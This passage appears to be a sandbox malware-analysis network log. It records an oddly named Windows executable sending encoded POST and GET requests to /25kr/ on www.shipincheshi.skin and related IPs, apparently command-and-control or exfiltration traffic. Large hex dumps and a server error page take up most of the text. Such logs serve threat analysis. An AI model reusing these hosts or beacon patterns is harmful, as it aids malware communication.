                                                              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd 5c ff 77 db 54 96 ff 79 fb 57 bc 35 05 3b c5 96 6c 27 71 9c c4 09 6b 1c 27 31 24 76 ea 38 2d 1d da f5 91 a5 67 5b 58 96 54 e9 39 89 5b 7a 0e ec ce 00 b3 db 52 3a b0 4c bb 0b cb 14 ce a1 3d b0 d3 ce ce 17 60 80 b2 ff 4c 9d a6 3f ed bf b0 f7 49 fe 22 4b cf 8e eb 82 c3 ac 72 92 58 4f f7 dd f7 b9 f7 dd 7b df bd cf 92 12 7f bf 92 4b 15 ce 6d a5 51 95 d4 95 e5 13 89 ce 3f 2c 48 cb 27 10 1c 89 3a 26 02 12 ab 82 61 62 b2 e4 db 29 ac 86 e2 be f6 25 22 13 05 2f 3f fa d3 77 8f be fb a4 75 fd c6 a3 0f 3e 79 fc c1 ad c3 fb f7 13 bc 7d c5 c1 40 15 ea 78 c9 67 68 25 8d 98 3e 24 6a 2a c1 2a b0 53 35 59 95 f0 7e 50 d5 ca 9a a2 68 7b 3e c4 b7 7b 99 a4 d9 e1 40 0f fe 14 7a 51 30 31 3a c5 77 9b 4a 9a d4 44 97 bb a7 f4 10 35 45 33 16 d0 33 d3 d3 d3 8b 7d 17 ca 30 e0 02 8a c4 f4 7d 74 06 1b 92 a0 0a 41 e4 5b c7 ca 2e 26 b2 28 a0 2c 6e 60 5f 10 55 3b 0d 41 94 34 64 41 09 22 ff a6 2c 1a 9a a9 95 09 3a 27 ac 63 d9 1f 44 a6 a0 9a 21 13 1b 72 b9 7f 88 ba 60 54 64 75 01 85 fb 9b 75 41 92 64 b5 [TRUNCATED]
                                                              Data Ascii: \wTyW5;l'qk'1$v8-g[XT9[zR:L=`L?I"KrXO{KmQ?,H':&ab)%"/?wu>y}@xgh%>$j**S5Y~Ph{>{@zQ01:wJD5E33}0}tA[.&(,n`_U;A4dA",:'cD!r`TduuAd(j2]vRyB|/h{q*<vuUdhlDqn=\W~0[e#DxD,iX@LM%)FkHRpaT``z?CIHfDPs4.d@=Yd6.vI52<lMIkCKbU`RW?;num;T2$46B738@PgFseXzCPJi*`BK#DM*Zh C">B8nkpuYF-k%/\P:wI3?ajnvk|m aHe!h0%4*kpEMr)HP9MP=Qf..2-%Wj7uB5:RGpAr$#z$RV-))XsM863nd);lSR`4REz,jU,Kh4&Lx&k$k_yR
                                                              Sep 12, 2024 15:07:35.362653971 CEST1236INData Raw: 48 c7 52 0f 31 60 b1 7c 5a 9f 67 c8 6d ad 6a 47 2f 27 7d 43 fc 4c b4 31 30 1a 44 06 14 19 2c 0e 1e db ef 6a 15 98 f4 07 6c 26 23 49 de 5d 00 09 49 48 ac ca 8a c4 74 23 7b d1 1e 6d 65 6d d3 0e 59 5c 1d 0b 61 5f 3a 73 46 80 0a 12 52 55 93 9d d3 84
                                                              Data Ascii: HR1`|ZgmjG/'}CL10D,jl&#I]IHt#{memY\a_:sFRUveGHec =B|Z,}=3}d`NzDja[rcP}9Jde}NQ+;Ai[NEqdnv0`6b%0AX1tA'VmT
                                                              Sep 12, 2024 15:07:35.362670898 CEST448INData Raw: a2 73 d1 3b 75 a1 e3 35 05 fe c0 0a e0 c8 16 86 2c 28 d6 26 91 7b 29 81 55 2f 05 85 22 da 26 90 a3 7a 17 41 58 48 18 cb 1f 0c fe 33 5d c4 01 19 33 83 71 c3 f7 10 09 04 31 12 1b 0b c9 f9 0e 92 f3 f6 a8 9d d1 db f9 4c 68 d9 8a 9c 53 93 cc 6b 76 0c
                                                              Data Ascii: s;u5,(&{)U/"&zAXH3]3q1LhSkv'{B*#O`Z{&n&`PkFC$%EyFC4'F'8.iuW64*mkg0D{qy-]@+2uMd<Vn=:{Uz1@$
                                                              Sep 12, 2024 15:07:35.362766027 CEST1236INData Raw: ca 9f 2b 54 e2 4b 4c 45 30 55 04 ad 03 34 eb a0 18 3c 47 4f 6f 21 ab 32 35 f1 e3 b0 cd 94 a6 d5 e4 63 1a 7b 1b 9b 26 2d f2 8f 67 6c 03 d2 28 3e 6f 57 4a 3f b9 77 ee 6c a7 f3 63 ba 27 44 7c 66 9f 31 2d f9 48 a8 eb b9 cd f4 98 50 f9 aa 56 c7 fc a4
                                                              Data Ascii: +TKLE0U4<GOo!25c{&-gl(>oWJ?wlc'D|f1-HPVoB1wo]$|NzPgNwsB>]t;Ls+c"VIq&/ns\*1&BapB_Kgl!_MuZfL>*v-N~\9B%L|jf#4
                                                              Sep 12, 2024 15:07:35.362782001 CEST224INData Raw: c3 7a ec 96 7d d9 86 c2 0d 81 e2 d4 6f 0f 85 f9 62 33 45 6d 3d 2b d4 dd 13 3a 44 16 97 28 4e 26 2c 91 06 4b 34 70 36 06 0c 0c 63 16 3b a7 c5 52 b3 68 f9 29 63 c8 b6 85 0e 19 78 1c 25 b7 ef e8 1f 69 ba bd 2a 2a 08 15 4b 41 0c 54 fd 68 fa cf 0c 4c
                                                              Data Ascii: z}ob3Em=+:D(N&,K4p6c;Rh)cx%i**KAThL:9H3!V['A<CNz!HOSZ] ,*)Cy\I_?sh8'#zgIcO(3@5]U}/aqVH7zol
                                                              Sep 12, 2024 15:07:35.362919092 CEST635INData Raw: aa 7c 81 13 bb ae 35 a8 67 1b af 05 90 d3 1b 66 b5 d3 77 8a 49 ee 35 db 2b 5e f9 3d 16 c3 e6 e0 e8 79 92 ea 69 db 5a 10 40 f8 8e 4d 05 4c 43 0c 5a 67 8c 50 6f 76 a8 bb 41 45 04 c7 21 b8 ad ed 80 df 26 f0 bb 14 dd 77 62 93 70 82 d9 54 45 3a ad 7e
                                                              Data Ascii: |5gfwI5+^=yiZ@MLCZgPovAE!&wbpTE:~EXLMU4Ajc! NZXRqG7e@`@44O[ZM/G'?~_~sO>"^D3}Z45U*)"5


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              31192.168.2.449773154.23.176.197805084C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 12, 2024 15:07:37.000893116 CEST10809OUTPOST /25kr/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Cache-Control: no-cache
                                                              Content-Length: 10300
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Host: www.shipincheshi.skin
                                                              Origin: http://www.shipincheshi.skin
                                                              Referer: http://www.shipincheshi.skin/25kr/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Data Raw: 33 74 56 3d 44 44 79 35 63 45 41 78 35 34 37 35 73 6e 47 2f 4d 74 55 7a 4d 6a 51 6b 59 4c 55 34 77 31 47 79 57 36 70 64 56 71 36 4d 65 44 6b 6b 6b 58 52 6f 52 62 7a 4e 67 74 78 42 41 62 76 6a 73 53 63 48 69 62 64 4d 38 59 43 2f 38 72 55 71 47 76 35 49 69 56 51 55 6b 35 70 79 36 33 49 4b 53 43 36 77 79 6e 6c 43 6b 6c 61 67 7a 4d 71 57 4b 52 42 39 39 32 54 52 47 36 63 6f 77 56 56 42 2b 57 77 48 30 74 6d 72 68 4e 70 77 6d 62 49 50 79 30 39 44 7a 6e 79 47 71 4f 4e 41 45 6c 37 35 4a 64 7a 49 33 52 66 64 78 4c 67 50 33 7a 6c 46 55 6d 48 6f 6a 4f 7a 34 4b 77 43 62 73 6b 4b 6b 37 78 70 66 6a 75 6b 4b 4d 51 41 31 41 52 6e 58 4f 4f 54 55 4c 50 39 44 48 47 37 45 73 72 4d 38 38 57 78 38 38 61 55 33 4e 79 79 37 58 69 6a 58 62 59 2b 4c 63 75 4f 52 78 64 48 7a 45 74 4b 49 30 62 52 73 35 44 59 34 64 44 58 64 36 36 72 79 62 57 51 66 30 30 47 2f 7a 2f 61 73 57 47 65 4f 45 74 6a 75 37 37 55 4f 47 61 68 39 6e 34 53 50 65 74 63 30 50 65 44 55 78 38 43 51 69 6b 4c 31 32 4f 6a 46 46 48 6d 66 31 63 41 48 43 2b 56 53 4f 56 [TRUNCATED]
                                                              Data Ascii: 3tV=DDy5cEAx5475snG/MtUzMjQkYLU4w1GyW6pdVq6MeDkkkXRoRbzNgtxBAbvjsScHibdM8YC/8rUqGv5IiVQUk5py63IKSC6wynlCklagzMqWKRB992TRG6cowVVB+WwH0tmrhNpwmbIPy09DznyGqONAEl75JdzI3RfdxLgP3zlFUmHojOz4KwCbskKk7xpfjukKMQA1ARnXOOTULP9DHG7EsrM88Wx88aU3Nyy7XijXbY+LcuORxdHzEtKI0bRs5DY4dDXd66rybWQf00G/z/asWGeOEtju77UOGah9n4SPetc0PeDUx8CQikL12OjFFHmf1cAHC+VSOVAbutZDOXcNNAUZCpZdNDw5w39IhOQPlkhJIFDnAvltHB0kwFdHY3MyG7LUuLK+/6rZ8i43+My5GfxxVoPGtO/OZCik6z9rJvkHAxRY6KDucP6JqNI3YJZtsTuF5F4cG/orNV4ZD5n7+2flNsEG3R4NiYczGwFiSe2Ph+2i1OBpSMdx425I210dlVcPYH8sE8RorgLj9/KFq4aPIeBHZQYracaDn1A2ZwM4s4prsYzBLg7ZUUFjDJEJucqoxoGDY1mVeloDF4vZJq5SkjufH5Ks/2jn2OADp3C6TwpKqGkkn6lniqJNNegfNCvjNNzKa80wlJp3Uter3RwSySls3OfY7O3pjmwPR99IUjP8WBrtpG0FQMXnNJVFdyL5YfZxGtxF/DRSUj/T1KXh1MvqFaKQXkvU9BKGGT5vsBS+cz0Mm1Pfq5xol4OfURu6IVoMgw1kEl/1Oy/Tr3q0K29N+Uqz8YS//lohCqvg5IMq/9bvm7cqXv9roCsYRHOX9r1z9aNB/xFhYIPxBIIydri9+zb1xQE/PBAX39UXXISA01g8hXN52CezA0eO5HkddM14npqwF99K4lNnp+wN8pLgqqs55LtX1+8aerdNvH4H7xVNlUJruxyt0ZHTRtJ3JA7EJ8h3ORxu9TJU69r4v8N52um0rOzHvBDU2M0l [TRUNCATED]
                                                              Sep 12, 2024 15:07:38.182912111 CEST1236INHTTP/1.1 404 Not Found
                                                              Date: Thu, 12 Sep 2024 13:18:49 GMT
                                                              Server: Apache
                                                              Upgrade: h2
                                                              Connection: Upgrade, close
                                                              Vary: Accept-Encoding
                                                              Content-Encoding: gzip
                                                              Content-Length: 12974
                                                              Content-Type: text/html; charset=utf-8
                                                              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd bd 7b 97 dc da 75 27 f6 77 f4 29 10 5a 36 79 6d b2 01 14 de f7 f2 5e 07 af 02 50 85 57 01 a8 a7 a5 70 a1 00 14 80 c2 fb 55 00 4a d6 5a 76 32 63 6b 12 c9 b2 c7 8e 47 4a ec 78 64 af 65 79 d9 19 69 32 93 d8 1e db 72 be 8c 78 75 f5 57 be 42 50 dd 6c b2 d9 5d cd 4b 51 36 af 27 e0 62 77 e1 e0 9c 7d 7e 7b 9f fd 3c 8d 02 9e fe b7 9c c6 5a 6b 9d 07 82 3a 89 3f f9 d2 d3 eb 5f 9e ed 7e f2 25 60 38 9e 26 5e 6d 03 4e 60 97 95 57 7f fc 60 6e 8d 9f 90 0f 5e 5c aa c3 3a f6 3e f9 c9 7f fe fb 9f fc fd 9f 3c ff f6 ef fd e4 0f fe e4 a7 7f f0 dd cf 7e f8 c3 a7 e0 d5 95 1b 04 52 3b f1 3e 7e 50 66 db ac ae 1e 00 4e 96 d6 5e 3a 90 4b b3 30 75 bd ee 71 9a ed b2 38 ce da 07 00 f8 62 54 55 f7 d7 14 4e 07 f8 cb 00 63 57 1e f0 cb e0 cb a6 6d e6 f6 c0 d7 5e 9e 9e 0e 27 8b b3 f2 43 e0 17 10 04 f9 e8 b5 0b bb 61 c2 0f 01 18 cf 3b 60 e1 95 ae 9d da 8f 81 07 a2 17 1f bc 3a 74 6c 40 f5 1a ef c1 63 20 b8 6e 78 0c d0 65 68 c7 8f 81 87 4a e8 94 59 95 ed 6a 60 6d 8b 5e f8 f0 31 50 d9 69 f5 a4 f2 ca 70 f7 [TRUNCATED]
                                                              Data Ascii: {u'w)Z6ym^PWpUJZv2ckGJxdeyi2rxuWBPl]KQ6'bw}~{<Zk:?_~%`8&^mN`W`n^\:><~R;>~PfN^:K0uq8bTUNcWm^'Ca;`:tl@c nxehJYj`m^1Pip]a!aW=S,94M*<z#&[/g54SI*2`I:CoO"?EtMuU.eG{1/Fn=7I~~zNVuKpxA_@?,|0+R0-+evv"lxN[fnL7^>qBb/P{x}r";z%/=;;C$jptrP4<qxW>m}&)cmmKdRns7_$^UwqT\=U~:y^5jF\G?Odd-AFd8qq*x;>vgV}+(TxOr}3v%RA=w,sYN72L/-fgNtk>R/o;(aS
                                                              Sep 12, 2024 15:07:38.183017015 CEST224INData Raw: 90 d5 41 e8 9c 4c e1 6d ad e4 ac fe 5d 9a ee a0 63 e4 e7 7b a8 db 62 8d c3 af 9d 53 db 2b 82 6f 72 4b f7 bb 9b 37 78 a3 b7 c3 74 57 c7 ef 4d b6 5f 4e 73 67 b1 de 62 b1 ef e3 f5 35 37 f0 d6 8b fa 4f e2 e9 ce 89 a7 2e 87 60 f9 f3 da fc 19 be 2f a3
                                                              Data Ascii: ALm]c{bS+orK7xtWM_Nsgb57O.`/"{|Oq),!7<|8pX?q0vU~@Z:rHU9]^o>t\d0?wKagGONFbp3`7
                                                              Sep 12, 2024 15:07:38.183051109 CEST1236INData Raw: 78 d7 92 eb 74 dc 57 5f be 1d 4a a0 4a ec f8 96 da be 36 21 72 bb 9e 7d 9b 78 75 95 a0 bc 70 61 d0 6d 86 ae fd a6 e3 38 6f 0d b7 3e 6d 76 9c 81 f9 42 68 6f 59 09 dc 6f f6 3f 8b b9 df 84 e5 de 63 ac d0 5d 27 38 64 2c a7 ad 95 f8 5a 0d 06 4f 77 46
                                                              Data Ascii: xtW_JJ6!r}xupam8o>mvBhoYo?c]'8d,ZOwF/oXKg2huy_I 'eG>--Ko8{gxR5:LiPjs[oHH{i='uaZ_dghq{i_r00o^
                                                              Sep 12, 2024 15:07:38.183106899 CEST1236INData Raw: 26 ff 17 1a c4 07 64 67 33 98 db f0 ef 74 b2 6b e0 4c 62 73 89 e4 2b d7 48 be 72 35 eb f5 ec 2f f2 99 27 9f 5c 7a ce 0f de 67 5e 33 2f e3 57 bc 8f 06 d7 73 ab e1 24 8c 3b 6c ff 33 0b 67 80 70 89 e3 7d 8a 85 ce f3 57 6c a3 d0 a0 18 b7 5b de 8b 24
                                                              Data Ascii: &dg3tkLbs+Hr5/'\zg^3/Ws$;l3gp}Wl[$I/g~zT6FK<;M@n}<_zs2K/${?}bxI^Cuy28W2=fLOWuyRsxPRT
                                                              Sep 12, 2024 15:07:38.183141947 CEST448INData Raw: 6c 02 2a 7a 0d 1e 0c dc 9d 1e 92 85 43 13 33 98 e2 5c 56 51 d5 59 3a 96 10 04 99 f4 75 b6 48 e4 04 4f 2a cb 1c 2d 16 70 05 81 53 73 5a fb 08 0f 1c 39 48 e6 7c 2c 68 40 69 b7 d9 78 4b a2 48 9d 48 37 f9 70 4a d4 6d 61 c5 c1 14 6e a4 23 15 7a b3 d5
                                                              Data Ascii: l*zC3\VQY:uHO*-pSsZ9H|,h@ixKHH7pJman#zhkHHV{R,1OpA,N;1\x4YhiVk(whQEga@#F.>IB9lD,~8,'{z-R`oBZ.UTw.$D:S&`+\>Bb6.c
                                                              Sep 12, 2024 15:07:38.183177948 CEST1236INData Raw: fd cc 1d e2 62 d6 00 65 6d 09 07 af b6 9c 30 b4 b4 11 8e 70 a8 e5 f2 9b 43 14 53 25 92 62 92 e0 98 a2 8f 42 ee 92 6b 6d 8e 74 64 49 89 41 4d 2d d6 d5 56 82 c6 f9 d4 b0 e5 00 f1 c7 b5 3d d9 16 62 6f 4d c7 c4 0c b3 8e f3 45 17 4e 66 1a 5b cf e3 21
                                                              Data Ascii: bem0pCS%bBkmtdIAM-V=boMENf[!>vG}CHiFXS)PI(5^\N!]&56sreMRumo[!S)pnB&YV0W0YCH<<A7;I3b
                                                              Sep 12, 2024 15:07:38.183208942 CEST224INData Raw: 58 33 16 04 46 ce ba 21 79 eb b0 14 80 16 7b 6c 53 2f e7 c7 e5 74 2f 28 1b cc d9 4c 24 4a 69 a6 60 27 07 18 23 a0 56 3f 9b 86 e9 04 b5 01 69 2c 36 09 69 4a 0d 11 ee aa 46 29 68 ae 43 9d c5 2a 3b 4c d4 45 9e 70 e8 21 66 8c d9 48 eb 02 44 94 e8 79
                                                              Data Ascii: X3F!y{lS/t/(L$Ji`'#V?i,6iJF)hC*;LEp!fHDyydyV]3Xs6fdq_k;E B V1X"A@V>%FJ)RtACj>+#o}Hi(7u&+qan.7ER!v?
                                                              Sep 12, 2024 15:07:38.183243036 CEST1236INData Raw: a4 10 63 d8 f2 d0 70 41 07 70 72 1c 82 c3 50 b0 80 ee 74 6d eb 0a db 2f e8 9e 64 37 09 af a2 44 5a 34 54 2f 6e 27 c3 50 80 dc cf 70 76 99 d3 bc ad cd c6 58 0f 28 d3 3e 93 10 9f 2b d1 05 08 27 76 df d0 62 91 37 72 c7 29 ce 34 a5 80 49 c5 b7 a8 c5
                                                              Data Ascii: cpAprPtm/d7DZ4T/n'PpvX(>+'vb7r)4I(RLpI]&@"gKsYR"u48'gQn4Gh;oE$O[7]`3vh}gn!G~yS;^H[T+#UK8OF
                                                              Sep 12, 2024 15:07:38.183278084 CEST224INData Raw: 07 c6 dc 44 80 a5 1f cc 3c d7 8c 84 40 2b 8e 41 05 16 bc 0b 63 b3 ad b8 32 27 2b a7 93 3a 95 e7 47 21 27 4f 4b 67 b9 1d 65 3c ef c3 76 6a f8 48 4a 27 e5 c8 9a 09 79 35 88 48 21 0f 33 05 1e aa e8 75 17 85 cb 79 c5 f2 c1 7c 3d 5b ce 75 d9 91 11 9e
                                                              Data Ascii: D<@+Ac2'+:G!'OKge<vjHJ'y5H!3uy|=[udgdN{livQ;@MKs<Ss(y3CP#rC0}0pPJyN\$@CM*d[^C*&,|5O
                                                              Sep 12, 2024 15:07:38.183307886 CEST1236INData Raw: 90 b7 6b c7 89 5c 17 c9 5a d8 d4 c7 34 0c 9a c3 34 9c f0 fd 96 d1 bb cd a1 c3 b6 7b 45 ed 6b 02 0b 45 6c bb 71 68 14 26 27 29 36 de 55 53 51 37 e7 4c da 93 f9 3a d1 4d 97 50 94 5c 33 85 8e 93 76 b4 b9 5c 40 a2 21 d9 b3 24 26 82 ba e3 01 89 5c ee
                                                              Data Ascii: k\Z44{EkElqh&')6USQ7L:MP\3v\@!$&\-b<vU27qyiH.rWXCbX%(Cw1Yj}Xmq\kJtx2NqmV*[:2}dM .=waan+n369tO
                                                              Sep 12, 2024 15:07:38.188293934 CEST1236INData Raw: f2 c8 f7 e4 62 b3 1f 83 e3 78 33 15 93 f1 18 9a 44 80 a1 08 7c c8 97 a9 ae f8 30 d3 4b 9b 83 8d c6 50 5d 80 04 26 4c 63 c6 0e 6b 49 3f ae cc 55 11 b2 24 36 3b 2e 9b 7d ab 69 3a 10 35 35 e6 8d f8 ad 5f 4d b8 28 d3 b5 b5 ba 9d 4d 94 74 3a c6 c1 c5
                                                              Data Ascii: bx3D|0KP]&LckI?U$6;.}i:55_M(Mt:L6';I-*<Q-ukL9ZX%} A~och,RUP;1Ky*.r]dxTulE.fcZ` l,0+|s<[=0@(+YOwBO


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              32192.168.2.449774154.23.176.197805084C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 12, 2024 15:07:39.542717934 CEST436OUTGET /25kr/?3tV=OBaZfyA9mrXrqkerGJdoBE4AUoAB8BDMFL96R6e2a3wywxYSJcqYm8ZoKYyxvhEHyag814v77I5kSeFlkRp9ldlOkmNbRx3b8AF2oRSh5frHPX5DuU6sJMI=&IhkTb=xPfHG0o8kZI8 HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Connection: close
                                                              Host: www.shipincheshi.skin
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Sep 12, 2024 15:07:40.502587080 CEST1236INHTTP/1.1 404 Not Found
                                                              Date: Thu, 12 Sep 2024 13:18:51 GMT
                                                              Server: Apache
                                                              Upgrade: h2
                                                              Connection: Upgrade, close
                                                              Vary: Accept-Encoding
                                                              Transfer-Encoding: chunked
                                                              Content-Type: text/html; charset=utf-8
                                                              Data Raw: 32 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e e7 b3 bb e7 bb 9f e5 8f 91 e7 94 9f e9 94 99 e8 af af 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2f 2a 20 42 61 73 65 20 2a 2f 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 3a 20 31 36 70 78 20 56 65 72 64 61 6e 61 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 68 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 27 4d 69 63 72 6f 73 6f 66 74 20 59 61 48 65 69 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d [TRUNCATED]
                                                              Data Ascii: 2000<!DOCTYPE html><html><head> <meta charset="UTF-8"> <title></title> <meta name="robots" content="noindex,nofollow" /> <style> /* Base */ body { color: #333; font: 16px Verdana, "Helvetica Neue", helvetica, Arial, 'Microsoft YaHei', sans-serif; margin: 0; padding: 0 20px 20px; } h1{ margin: 10px 0 0; font-size: 28px; font-weight: 500; line-height: 32px; } h2{ color: #4288ce; font-weight: 400; padding: 6px 0; margin: 6px 0 0; font-size: 18px; border-bottom: 1px solid #eee; } h3{ margin: 12px; font-size: 16px; font-weight: bold; } abbr{ cursor: help; text-decoration: underline; text-decoration-style: dotted; } a{ color [TRUNCATED]
                                                              Sep 12, 2024 15:07:40.502619982 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a
                                                              Data Ascii: cursor: pointer; } a:hover{ text-decoration: underline; } .line-error{ background: #f8cbcb; } .echo table { width: 100%; } .echo pr
                                                              Sep 12, 2024 15:07:40.502634048 CEST1236INData Raw: 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 36 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 39 39 39 3b 0a
                                                              Data Ascii: padding: 16px; border-radius: 4px; background: #999; } .exception .source-code{ padding: 6px; border: 1px solid #ddd; background: #f9f9f9; overflow-x
                                                              Sep 12, 2024 15:07:40.502650023 CEST672INData Raw: 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 36 70 78 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61
                                                              Data Ascii: line-height: 16px; font-size:14px; font-family: Consolas,"Liberation Mono",Courier,Verdana,""; } .exception .trace ol{ margin: 12px; } .exception .trace ol li{
                                                              Sep 12, 2024 15:07:40.502665997 CEST1236INData Raw: 70 74 69 6f 6e 2d 76 61 72 20 74 61 62 6c 65 20 63 61 70 74 69 6f 6e 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78
                                                              Data Ascii: ption-var table caption{ text-align: left; font-size: 16px; font-weight: bold; padding: 6px 0; } .exception-var table caption small{ font-weight: 300; disp
                                                              Sep 12, 2024 15:07:40.502681017 CEST1236INData Raw: 23 30 30 38 20 7d 20 20 2f 2a 20 61 20 6b 65 79 77 6f 72 64 20 2a 2f 0a 20 20 20 20 20 20 20 20 70 72 65 2e 70 72 65 74 74 79 70 72 69 6e 74 20 2e 63 6f 6d 20 7b 20 63 6f 6c 6f 72 3a 20 23 38 30 30 20 7d 20 20 2f 2a 20 61 20 63 6f 6d 6d 65 6e 74
                                                              Data Ascii: #008 } /* a keyword */ pre.prettyprint .com { color: #800 } /* a comment */ pre.prettyprint .typ { color: #606 } /* a type name */ pre.prettyprint .lit { color: #066 } /* a literal value */ /* punctuation, l
                                                              Sep 12, 2024 15:07:40.502705097 CEST448INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 3e 3c 68 31 3e e6 a8 a1 e5 9d 97 e4 b8 8d e5 ad 98 e5 9c a8 3a 32 35 6b 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 0a
                                                              Data Ascii: <div><h1>:25kr</h1></div> </div> </div> <div class="source-code"> <pre class="prettyprint lang-php"><ol start="53"><li class="line-53"><code> $available =
                                                              Sep 12, 2024 15:07:40.502718925 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 24 6d 6f 64 75 6c 65 20 26 61 6d 70 3b 26 61 6d 70 3b 20 24 61 76 61 69 6c 61 62 6c 65 29 20 7b 0a 3c 2f 63 6f 64 65 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 6c 69 6e 65 2d 35 38 22 3e 3c
                                                              Data Ascii: if ($module &amp;&amp; $available) {</code></li><li class="line-58"><code> // </code></li><li class="line-59"><code> $this-&gt;request-&gt;setModule($module);</code></li><li class="li
                                                              Sep 12, 2024 15:07:40.502733946 CEST224INData Raw: 65 3e 3c 2f 6c 69 3e 3c 2f 6f 6c 3e 3c 2f 70 72 65 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 09 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 72 61 63 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 43 61 6c
                                                              Data Ascii: e></li></ol></pre> </div> <div class="trace"> <h2>Call Stack</h2> <ol> <li>in <a class="toggle" title="/www/wwwroot/jianche.zhongzhuankk144.sbs/thinkphp/library/think/
                                                              Sep 12, 2024 15:07:40.502748966 CEST1236INData Raw: 72 6f 75 74 65 2f 64 69 73 70 61 74 63 68 2f 4d 6f 64 75 6c 65 2e 70 68 70 20 6c 69 6e 65 20 36 32 22 3e 4d 6f 64 75 6c 65 2e 70 68 70 20 6c 69 6e 65 20 36 32 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                              Data Ascii: route/dispatch/Module.php line 62">Module.php line 62</a></li> <li> at <abbr title="think\route\dispatch\Module">Module</abbr>->init() in <a class="toggle" title="/www/wwwroot/jianche.zhongzhuank
                                                              Sep 12, 2024 15:07:40.507617950 CEST1236INData Raw: 34 41 55 6f 41 42 38 42 44 4d 46 4c 39 36 52 36 65 32 61 33 77 79 77 78 59 53 4a 63 71 59 6d 38 5a 6f 4b 59 79 78 76 68 45 48 79 61 67 38 31 34 76 37 37 49 35 6b 53 65 46 6c 6b 52 70 39 6c 64 6c 4f 6b 6d 4e 62 52 78 33 62 38 41 46 32 6f 52 53 68
                                                              Data Ascii: 4AUoAB8BDMFL96R6e2a3wywxYSJcqYm8ZoKYyxvhEHyag814v77I5kSeFlkRp9ldlOkmNbRx3b8AF2oRSh5frHPX5DuU6sJMI= </td> </tr> <tr> <td>IhkTb</td> <td>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              33192.168.2.44977545.113.201.77805084C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              TimestampBytes transferredDirectionData
